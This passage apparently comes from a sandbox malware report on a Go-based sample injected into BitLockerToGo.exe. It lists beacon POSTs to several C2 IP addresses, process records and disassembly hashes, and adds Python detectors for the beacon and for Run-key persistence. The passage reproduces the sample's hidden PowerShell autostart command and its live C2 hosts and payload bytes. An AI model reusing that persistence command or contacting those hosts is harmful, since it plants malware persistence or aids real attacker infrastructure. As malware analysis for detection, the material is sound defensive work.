                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.4 | 50017 | 91.212.166.91 | 80 | 7652 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:04:14.991453886 CEST | 299 | OUT | POST / HTTP/1.1
                                          Host: 91.212.166.91
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: 4zC63Lsg
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:15.922864914 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:15 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          14 | 192.168.2.4 | 50021 | 188.130.206.243 | 80 | 7652 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:04:15.966000080 CEST | 301 | OUT | POST / HTTP/1.1
                                          Host: 188.130.206.243
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: 862w18Vn
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:16.959208965 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:16 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests
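The sessions above are one request from PID 7652 (the injected BitLockerToGo.exe) fanned out to five hosts on plain port 80: the default Go net/http User-Agent, a fresh 8-character X-Api-Key on every request, the same 162-byte non-text body each time, and a 429 from every host. The response headers (text/plain; charset=utf-8, X-Content-Type-Options: nosniff, an 18-byte body that is the message plus a trailing newline) are exactly what Go's http.Error writes, so the server side is very likely Go as well. The script below is an added example, not part of the Joe Sandbox report or of the sample: it turns those observations into a small detector run over session records constructed by hand from the dumps above. The field names, the thresholds and the reading of the body as obfuscated ASCII are my own assumptions.

```python
"""Fingerprint the Go beacon seen in the sandbox HTTP sessions.

Added example; not part of the Joe Sandbox report or of the sample. The
session records are constructed by hand from the report's session dumps
(sessions 9 to 14, PID 7652); field names and thresholds are assumptions.
"""
import hashlib
import re

# 162-byte request body exactly as printed in the report's "Data Raw" lines.
PAYLOAD_HEX = (
    "18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 "
    "14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 "
    "12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 "
    "4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 "
    "4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 "
    "51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a"
)

# Constructed records: one request/response pair per session in the report.
SAMPLE_SESSIONS = [
    {"id": 9,  "dst": "188.130.206.243", "dport": 80, "ua": "Go-http-client/1.1",
     "api_key": "zbNBhDll", "body_hex": PAYLOAD_HEX, "status": 429},
    {"id": 10, "dst": "46.8.232.106", "dport": 80, "ua": "Go-http-client/1.1",
     "api_key": "pXRqnRHQ", "body_hex": PAYLOAD_HEX, "status": 429},
    {"id": 11, "dst": "46.8.236.61", "dport": 80, "ua": "Go-http-client/1.1",
     "api_key": "ieY9bnDS", "body_hex": PAYLOAD_HEX, "status": 429},
    {"id": 12, "dst": "93.185.159.253", "dport": 80, "ua": "Go-http-client/1.1",
     "api_key": "GRI3r7kS", "body_hex": PAYLOAD_HEX, "status": 429},
    {"id": 13, "dst": "91.212.166.91", "dport": 80, "ua": "Go-http-client/1.1",
     "api_key": "4zC63Lsg", "body_hex": PAYLOAD_HEX, "status": 429},
    {"id": 14, "dst": "188.130.206.243", "dport": 80, "ua": "Go-http-client/1.1",
     "api_key": "862w18Vn", "body_hex": PAYLOAD_HEX, "status": 429},
]

API_KEY_RE = re.compile(r"^[A-Za-z0-9]{8}$")


def decode_payload(hex_text):
    """Turn the report's space-separated hex dump into bytes."""
    return bytes.fromhex(hex_text.replace(" ", ""))


def payload_stats(payload):
    """Cheap shape test: is the body text, random-looking, or something else?"""
    control = sum(1 for b in payload if b < 0x20)
    return {
        "length": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "control_fraction": control / len(payload),
        "high_bit_set": any(b & 0x80 for b in payload),
    }


def beacon_indicators(sessions):
    """Return the traits that make this traffic look like a beacon."""
    reasons = []
    bodies = {hashlib.sha256(decode_payload(s["body_hex"])).hexdigest() for s in sessions}
    hosts = {s["dst"] for s in sessions}
    keys = [s["api_key"] for s in sessions]
    first = decode_payload(sessions[0]["body_hex"])

    if len(bodies) == 1 and len(hosts) > 1:
        reasons.append(f"identical {len(first)}-byte body POSTed to {len(hosts)} different hosts")
    if all(API_KEY_RE.match(k) for k in keys) and len(set(keys)) == len(keys):
        reasons.append("X-Api-Key is an 8-char alphanumeric token that changes on every request")
    if all(s["ua"].startswith("Go-http-client/") for s in sessions):
        reasons.append("default Go net/http User-Agent")
    stats = payload_stats(first)
    # Assumption: about half the bytes below 0x20 and the high bit never set is
    # unlike text and unlike compressed or encrypted data; it fits a byte-wise
    # obfuscation of ASCII. The report does not confirm the scheme.
    if stats["control_fraction"] > 0.25 and not stats["high_bit_set"]:
        reasons.append("body is neither text nor random-looking (obfuscated ASCII?)")
    if all(s["status"] == 429 for s in sessions):
        reasons.append("every host answers 429 Too Many Requests")
    return reasons


def c2_candidates(sessions):
    """Distinct host:port pairs for the blocklist, in first-seen order."""
    seen = []
    for s in sessions:
        pair = f'{s["dst"]}:{s["dport"]}'
        if pair not in seen:
            seen.append(pair)
    return seen


if __name__ == "__main__":
    for reason in beacon_indicators(SAMPLE_SESSIONS):
        print("-", reason)
    print("C2 candidates:", ", ".join(c2_candidates(SAMPLE_SESSIONS)))
```

The rotating X-Api-Key is the trait worth keeping in a detection: a real API key would be stable across requests, so a header that changes on every POST while the body stays byte-identical is closer to a per-request nonce. The 429 answers tell you nothing about the body; they are the same generic text from every host, which is consistent with either a real rate limit or a server that only talks to clients it recognises.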



                                          Target ID:0
                                          Start time:08:02:38
                                          Start date:18/10/2024
                                          Path:C:\Users\user\Desktop\BwqqVoHR71.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\BwqqVoHR71.exe"
                                          Imagebase:0x840000
                                          File size:19'172'088 bytes
                                          MD5 hash:0A21A94198F6157ABB36BF55CB43BE27
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:5
                                          Start time:08:02:52
                                          Start date:18/10/2024
                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                          Imagebase:0xcb0000
                                          File size:231'736 bytes
                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:6
                                          Start time:08:03:00
                                          Start date:18/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
                                          Imagebase:0x720000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:08:03:00
                                          Start date:18/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:08:03:11
                                          Start date:18/10/2024
                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                          Imagebase:0xcb0000
                                          File size:231'736 bytes
                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false
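The Target ID 6 entry above is the persistence step: a hidden PowerShell window writes an HKCU Run value named App that points at the BitLockerToGo.exe copy under C:\Windows\BitLockerDiscoveryVolumeContents, which is what the "Creates an autostart registry key pointing to binary in C:\Windows" signature refers to. Note that the guard in that command line, Test-Path on ...\Run\App, tests for a subkey named App rather than for the value, so it never short-circuits and the value is rewritten on every launch. The script below is an added example, not part of the Joe Sandbox report, that pulls such Run-key writes out of recorded PowerShell command lines and scores them; the process records are constructed (the first command line is copied from the Target ID 6 entry, the PIDs and the second, benign record are made up).

```python
r"""Triage: pull the autorun write out of a recorded PowerShell command line.

Added example, not part of the Joe Sandbox report. It parses Set-ItemProperty
and New-ItemProperty calls aimed at Run/RunOnce keys and flags targets that
live under the Windows directory but outside System32/SysWOW64. The process
records are constructed; the first command line is the report's Target ID 6.
"""
import re

# Constructed process-creation records: (pid, image, command line).
SAMPLE_PROCESSES = [
    (7700, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"'),
    (7701, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign, constructed
     r'powershell -Command "Set-ItemProperty -Path \"HKCU:\\Software\\Contoso\\Agent\" -Name \"Theme\" -Value \"dark\""'),
]

RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)$", re.I)
CMDLET_RE = re.compile(r"(?:Set|New)-ItemProperty\b(?P<args>[^;}]*)", re.I)
# Arguments arrive with shell-escaped quotes (\"...\") in the recorded command line.
ARG_RE = re.compile(r'-(?P<flag>Path|Name|Value)\s+\\?"(?P<val>[^"]*?)\\?"', re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def normalise_key(path):
    """Collapse the doubled backslashes the command line carries."""
    return re.sub(r"\\+", r"\\", path)


def extract_autorun_writes(cmdline):
    """Return one {key, name, value} per property write against a Run/RunOnce key."""
    writes = []
    for m in CMDLET_RE.finditer(cmdline):
        args = {flag.lower(): val for flag, val in ARG_RE.findall(m.group("args"))}
        key = normalise_key(args.get("path", ""))
        if RUN_KEY_RE.search(key):
            writes.append({"key": key, "name": args.get("name"), "value": args.get("value")})
    return writes


def assess_autorun(write, cmdline):
    """Reasons this autorun entry deserves attention (empty list = looks ordinary)."""
    reasons = []
    target = (write.get("value") or "").strip('"').lower()
    if target.startswith("c:\\windows\\") and not target.startswith(SYSTEM_DIRS):
        reasons.append("target under C:\\Windows but outside System32/SysWOW64")
    if re.search(r"-windowstyle\s+hidden", cmdline, re.I):
        reasons.append("written from a hidden PowerShell window")
    # Test-Path on a registry path tests for a key, not a value, so a guard
    # like the report's never fires and the write is repeated on every launch.
    if re.search(r"Test-Path\s+\S*HK\w+:", cmdline, re.I):
        reasons.append("guarded by Test-Path on a registry key (re-applied each run)")
    return reasons


def triage(records):
    """Scan (pid, image, cmdline) records; keep only PowerShell Run-key writes."""
    hits = []
    for pid, image, cmdline in records:
        if "powershell" not in image.lower():
            continue
        for w in extract_autorun_writes(cmdline):
            hits.append({"pid": pid, **w, "reasons": assess_autorun(w, cmdline)})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_PROCESSES):
        print(hit["pid"], hit["key"], hit["name"], "=", hit["value"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

On a live host the same facts come from Sysmon event ID 13 (RegistryEvent value set) on the Run key or from event ID 1 command lines; the parser above is only needed when all you have is the recorded command line, as in this report.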

                                            Strings
                                            • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian , xrefs: 0087BB32
                                            • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 0087BAFE
                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,, xrefs: 0087BBB4
                                            • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi, xrefs: 0087BB59
                                            • ) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX, xrefs: 0087BABC
                                            • %, xrefs: 0087BBF1
                                            • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H, xrefs: 0087BBE8
                                            • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App, xrefs: 0087BB8D
                                            • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789, xrefs: 0087BAD7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1992489804.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                            • Associated: 00000000.00000002.1992465642.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1992782995.0000000000D1E000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1992782995.000000000171E000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1995409002.00000000019A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1995427189.00000000019A9000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1995477141.00000000019AA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1995936120.00000000019AB000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1995981794.00000000019AD000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996001964.00000000019AE000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996048401.0000000001A10000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996061779.0000000001A12000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996074266.0000000001A14000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996089045.0000000001A1D000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996100966.0000000001A1E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996113479.0000000001A20000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996128915.0000000001A21000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996128915.0000000001A2C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996128915.0000000001A64000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996128915.0000000001A69000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996196049.0000000001A6D000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996208098.0000000001A6E000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996208098.0000000001AB6000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1996208098.0000000001AC6000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_BwqqVoHR71.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian $bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                            • API String ID: 0-290768958
                                            • Opcode ID: 1fe562796d133b50ae8726bc99b547644a605091aac4cdda96a541f6ab3ca48a
                                            • Instruction ID: f7f45d5f32b440e1acc47483039ac06f002bf87f13c81e789859e23c3f399826
                                            • Opcode Fuzzy Hash: 1fe562796d133b50ae8726bc99b547644a605091aac4cdda96a541f6ab3ca48a
                                            • Instruction Fuzzy Hash: BA91BAB45087058FD350EF68D099B5ABBE0FF89708F10896CE5888B392E775E949CF52
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 180360e4cdc75274ed0d50b2b770a091fc2aed36209b78a9c3c3875f3fc8ad39
                                            • Instruction ID: 862e471e821d8338dabcbabb455b3a3ff8cc54f2456cbab18036ed57df9297d9
                                            • Opcode Fuzzy Hash: 180360e4cdc75274ed0d50b2b770a091fc2aed36209b78a9c3c3875f3fc8ad39
                                            • Instruction Fuzzy Hash: 3421F935B01118DFCB08DFA9D58499DBBF2EF88310B25C195E505AB3A1CB35EC868B90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f259140b55326634f09e4453c8d465e5ad029ebd1529faf32831370d60bc535d
                                            • Instruction ID: 103e89fcffff1d96449074fbb1c654c65a9298585b2d0c87e3fff39eeba90e5a
                                            • Opcode Fuzzy Hash: f259140b55326634f09e4453c8d465e5ad029ebd1529faf32831370d60bc535d
                                            • Instruction Fuzzy Hash: 29B16D74A06204DFCB14CFA8C4909AEBBF2FF89314F1585A9E4459B3A2D735EC46CB50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23229ab155db6004125d099b29d650021b58c957810af4edf774f237d538e8ea
                                            • Instruction ID: 27dfbe5499bd7b870d808f4ece6826641afded542eac264115dd7111792df391
                                            • Opcode Fuzzy Hash: 23229ab155db6004125d099b29d650021b58c957810af4edf774f237d538e8ea
                                            • Instruction Fuzzy Hash: F8916BB5A01205DFCB15CF59C494AAEBBB1FF48310B248699D915AB3A2C735FC51CBA0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b14f7624488cd959ae8e73d3f20d7c97f3ba01ff1fe2bcef2ae03215f119aed
                                            • Instruction ID: d7c80f8ca502f73193f8de8b87b1c5b4006548315170f84ddd49cfa45bebabc1
                                            • Opcode Fuzzy Hash: 5b14f7624488cd959ae8e73d3f20d7c97f3ba01ff1fe2bcef2ae03215f119aed
                                            • Instruction Fuzzy Hash: 894125B5A01109DFCB09CF59C498AAEFBB1FF48314B158699D805AB3A5C732FC51CBA0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2002417062.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4700000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91c806970792f9de3888b1cb216f0c16cfeba4aff6bacb2462c1b78e91f46402
                                            • Instruction ID: 2901982d3c9565e5df29f41f11f66ef51e34b063a185fdbf8d3f16a3b771576f
                                            • Opcode Fuzzy Hash: 91c806970792f9de3888b1cb216f0c16cfeba4aff6bacb2462c1b78e91f46402
                                            • Instruction Fuzzy Hash: CD11E278A01108DFCB08DFA9E58099DFBF2FF88314F25C1A5E904A7351C735AD858BA0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2001563261.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7529a5bc87e26966e5d6959aab05e330d32bfe1e03abd363632ca702a6b19207
                                            • Instruction ID: 3e63578a7bf9b58699dcd755499ad292444b2a9befda1b2e37b3695f482cec51
                                            • Opcode Fuzzy Hash: 7529a5bc87e26966e5d6959aab05e330d32bfe1e03abd363632ca702a6b19207
                                            • Instruction Fuzzy Hash: 8F01A2B15093409AE7208EA9C9C4F66BF99DF41364F28C41BED8C4B3E2C7799C41C6B1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2001563261.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: baab052f28f895015c4996d8674275c61af09a6860d2baa8c63416f9351ba88a
                                            • Instruction ID: ec6535290c7d9a082e72b69ebedd9b2dc7b10efae32f57e533fea7a8cc89decd
                                            • Opcode Fuzzy Hash: baab052f28f895015c4996d8674275c61af09a6860d2baa8c63416f9351ba88a
                                            • Instruction Fuzzy Hash: 57015E7240E3C05EE7128B258994B56BFB8DF53224F1DC0DBD9888F2E3C2695849C772